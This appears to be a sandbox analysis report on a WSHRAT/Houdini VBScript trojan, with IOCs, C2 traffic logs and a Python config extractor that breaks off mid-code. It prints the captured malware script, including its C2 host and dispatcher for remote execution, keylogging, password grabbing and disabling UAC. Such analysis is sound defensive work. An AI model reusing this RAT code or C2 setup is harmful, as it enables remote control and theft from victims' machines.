
Windows Analysis Report
ORDER230322.vbs

Overview

General Information

Sample Name: ORDER230322.vbs
Analysis ID: 832141
MD5: 2a76503660d140d0aa08bd758cb9c29c
SHA1: 55c1ba23321e11c0298450fb9dfa1ccebdea2d86
SHA256: 5f0329e51f347ca573ea69cd865bb03d0526d9e9e91477a4502a9fe35c3fbddf
Tags: RAT, vbs, WSHRAT

Detection

WSHRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected WSHRAT
Detected WSHRat
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Snort IDS alert for network traffic
Wscript called in batch mode (suppress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Drops VBS files to the startup folder
Windows Shell Script Host drops VBS files
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2352 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5448 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1276 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 4024 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6032 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
Name: Houdini, WSHRAT
Description: Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
{"C2 url": "chongmei33.publicvm.com", "Port": "7045", "Install folder": "%temp%"}
Source                  Rule                Description            Author
dump.pcap               JoeSecurity_WSHRAT  Yara detected WSHRAT   Joe Security
amsi64_5492.amsi.csv    JoeSecurity_WSHRAT  Yara detected WSHRAT   Joe Security
amsi64_2352.amsi.csv    JoeSecurity_WSHRAT  Yara detected WSHRAT   Joe Security
amsi64_5448.amsi.csv    JoeSecurity_WSHRAT  Yara detected WSHRAT   Joe Security
amsi64_4024.amsi.csv    JoeSecurity_WSHRAT  Yara detected WSHRAT   Joe Security

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5492, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs

Persistence and Installation Behavior

Source: Registry Key set; Author: Joe Security; Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 5492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ORDER230322
Snort IDS Alerts (sorted by time)

Timestamp                  Source              Destination          Protocol  SID      Classtype
03/22/23-11:37:51.449935   192.168.2.3:49698   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:37:58.976360   192.168.2.3:49699   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:04.682959   192.168.2.3:49700   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:10.473997   192.168.2.3:49701   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:16.269118   192.168.2.3:49702   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:21.870237   192.168.2.3:49703   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:31.858320   192.168.2.3:49705   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:37.956187   192.168.2.3:49706   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:44.353443   192.168.2.3:49707   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:50.072461   192.168.2.3:49708   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:38:55.844827   192.168.2.3:49709   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:01.482922   192.168.2.3:49710   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:07.144389   192.168.2.3:49711   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:12.966342   192.168.2.3:49712   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:18.634150   192.168.2.3:49713   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:24.263757   192.168.2.3:49714   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:32.263868   192.168.2.3:49715   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:38.695593   192.168.2.3:49716   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:44.283625   192.168.2.3:49717   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:50.397216   192.168.2.3:49718   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:39:56.012177   192.168.2.3:49719   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:01.578389   192.168.2.3:49720   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:08.630285   192.168.2.3:49721   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:14.190562   192.168.2.3:49722   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:19.769701   192.168.2.3:49723   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:25.447386   192.168.2.3:49724   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:31.131057   192.168.2.3:49725   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:36.721932   192.168.2.3:49726   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:42.430467   192.168.2.3:49727   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:47.984993   192.168.2.3:49728   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:40:53.627793   192.168.2.3:49729   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:41:00.836849   192.168.2.3:49730   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:41:06.386063   192.168.2.3:49731   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected
03/22/23-11:41:12.041835   192.168.2.3:49732   103.47.144.22:7045   TCP       2017516  A Network Trojan was detected

AV Detection

Source: ORDER230322.vbs; ReversingLabs: Detection: 27%
Source: ORDER230322.vbs; Virustotal: Detection: 41%
Source: amsi64_5492.amsi.csv; Malware Configuration Extractor: WSHRAT {"C2 url": "chongmei33.publicvm.com", "Port": "7045", "Install folder": "%temp%"}

Networking

Source: C:\Windows\System32\wscript.exe; Domain query: chongmei33.publicvm.com
Source: C:\Windows\System32\wscript.exe; Network Connect: 103.47.144.22 7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49698 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49699 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49700 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49701 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49702 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49703 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49705 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49706 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49707 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49708 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49709 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49710 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49711 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49712 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49713 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49714 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49715 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49716 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49717 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49718 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49719 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49720 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49721 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49722 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49723 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49724 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49725 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49726 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49727 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49728 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49729 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49730 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49731 -> 103.47.144.22:7045
Source: Traffic; Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49732 -> 103.47.144.22:7045
Source: Malware configuration extractor; URLs: chongmei33.publicvm.com
Source: unknown; Network traffic detected: HTTP traffic on port 49698 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49699 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49700 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49702 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49703 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 7045 -> 49703
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49707 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49709 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49710 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49712 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49713 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49714 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49715 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49716 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49717 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49718 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49720 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49721 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49723 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49724 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49725 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49726 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49727 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49728 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49729 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 7045
Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 7045
Source: global traffic; TCP traffic: 192.168.2.3:49698 -> 103.47.144.22:7045
Source: unknown; HTTP traffic detected (check-in request as captured):
    POST /is-ready HTTP/1.1
    Accept: */*
    user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: chongmei33.publicvm.com:7045
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown; DNS traffic detected: queries for: chongmei33.publicvm.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match; File source: amsi64_5492.amsi.csv, type: OTHER
Source: Yara match; File source: amsi64_2352.amsi.csv, type: OTHER
Source: Yara match; File source: amsi64_5448.amsi.csv, type: OTHER
Source: Yara match; File source: amsi64_4024.amsi.csv, type: OTHER
Source: Yara match; File source: dump.pcap, type: PCAP

System Summary

Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: ORDER230322.vbs; Initial sample: Strings found which are bigger than 50
Source: ORDER230322.vbs; ReversingLabs: Detection: 27%
Source: ORDER230322.vbs; Virustotal: Detection: 41%
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs"
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
Source: classification engine; Classification label: mal100.troj.expl.evad.winVBS@8/4@1/1
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface (captured script buffer, truncated in the report; line breaks restored, text otherwise as captured):
    WScript.Sleep 1009
    '<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
    '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    host = "chongmei33.publicvm.com"
    port = 7045
    installdir = "%temp%"
    lnkfile = true
    lnkfolder = true
    '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
    dim shellobj
    set shellobj = wscript.createobject("wscript.shell")
    dim filesystemobj
    set filesystemobj = createobject("scripting.filesystemobject")
    dim httpobj
    set httpobj = createobject("msxml2.xmlhttp")
    '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
    installname = wscript.scriptname
    startup = shellobj.specialfolders ("startup") & "\"
    installdir = shellobj.expandenvironmentstrings(installdir) & "\"
    if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
    spliter = "|"
    sleep = 5000
    dim response
    dim cmd
    dim param
    info = ""
    usbspreading = ""
    startdate = ""
    dim oneonce
    '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
    on error resume next
    instance
    while true
    install
    response = ""
    response = post ("is-ready","")
    cmd = split (response,spliter)
    select case cmd (0)
    case "disconnect"
        wscript.quit
    case "reboot"
        shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUE
    case "shutdown"
        shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUE
    case "excecute"
        param = cmd (1)
        execute param
    case "get-pass"
        passgrabber cmd(1), "cmdv.exe", cmd(2)
    case "uninstall"
        uninstall
    case "up-n-exec"
        download cmd (1),cmd (2)
    case "bring-log"
        upload installdir & "wshlogs\" & cmd (1), "take-log"
    case "down-n-exec"
        sitedownloader cmd (1),cmd (2)
    case "filemanager"
        servicestarter cmd(1), "fm-plugin.exe", information()
    case "rdp"
        servicestarter cmd(1), "rd-plugin.exe", information()
    case "keylogger"
        keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0
    case "offline-keylogger"
        keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1
    case "browse-logs"
        post "is-logs", enumfaf(installdir & "wshlogs")
    case "cmd-shell"
        param = cmd (1)
        post "is-cmd-shell",cmdshell (param)
    case "get-processes"
        post "is-processes", enumprocess()
    case "disable-uac"
        if WScript.Arguments.Named.Exists("elevated") = true then
            set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
            oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0
            oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0
            oReg = nothing
            updatestatus("UAC+Disabled+(Reboot+Required)")
        end if
    case "elevate"
        if WScript.Arguments.Named.Exists("elevated") = false then
            on error resume next
            oneonce.close()
            oneonce = nothing
            WScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1
            updatestatus("Client+Elevated")
            WScript.quit
        else
            updatestatus("Client+Elevated")
        end if
    case "if-elevate"
        if WScript.Arguments.Named.Exists("el
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), "cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post 
"is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0oReg = nothingupdatestatus("UAC+Disabled+(Reboot+Required)") end ifcase "elevate" if WScript.Arguments.Named.Exists("elevated") = false thenon error resume nextoneonce.close()oneonce = nothingWScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1updatestatus("Client+Elevated")WScript.quit elseupdatestatus("Client+Elevated") end ifcase "if-elevate" if WScript.Arguments.Named.Exists("el
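The capture above exposes the two things an analyst wants from a WSHRAT sample without running it: the C2 configuration (host, port, install directory, field separator, beacon interval) and the verbs the dispatcher accepts. The Python below is an added example and is not part of the Joe Sandbox report or of the malware. It extracts both with regular expressions written against the token shapes visible in the capture (`key = "value"`, `key = 1234`, `key = true`, `case "verb"`, `post "endpoint"`) and derives the beacon URLs the bot will request from the `post` calls. The embedded sample is a constructed excerpt that reproduces the config lines, the beacon call and a handful of dispatcher labels from the capture; the helper bodies are omitted.

```python
"""Pull the C2 configuration and command table out of a WSHRAT-style VBScript.

Added example, not part of the Joe Sandbox report or of the malware.
"""
import re

# Constructed excerpt: config block, beacon call and a few dispatcher labels
# reproduced from the capture shown in the report. Helper bodies are omitted.
SAMPLE_SCRIPT = r'''
WScript.Sleep 1009
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "chongmei33.publicvm.com"
port = 7045
installdir = "%temp%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
spliter = "|"
sleep = 5000
on error resume next
while true
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "disconnect"
 wscript.quit
case "reboot"
 shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUE
case "excecute"
 param = cmd (1)
 execute param
case "get-pass"
 passgrabber cmd(1), "cmdv.exe", cmd(2)
case "up-n-exec"
 download cmd (1),cmd (2)
case "browse-logs"
 post "is-logs", enumfaf(installdir & "wshlogs")
case "cmd-shell"
 post "is-cmd-shell",cmdshell (param)
case "get-processes"
 post "is-processes", enumprocess()
case "disable-uac"
case "elevate"
'''

# Config keys seen in the capture. A value is a quoted string, a bare integer
# or the literal true/false; anything else (e.g. the later
# `installdir = shellobj.expandenvironmentstrings(...)`) is not a config value.
_ASSIGN_RE = re.compile(
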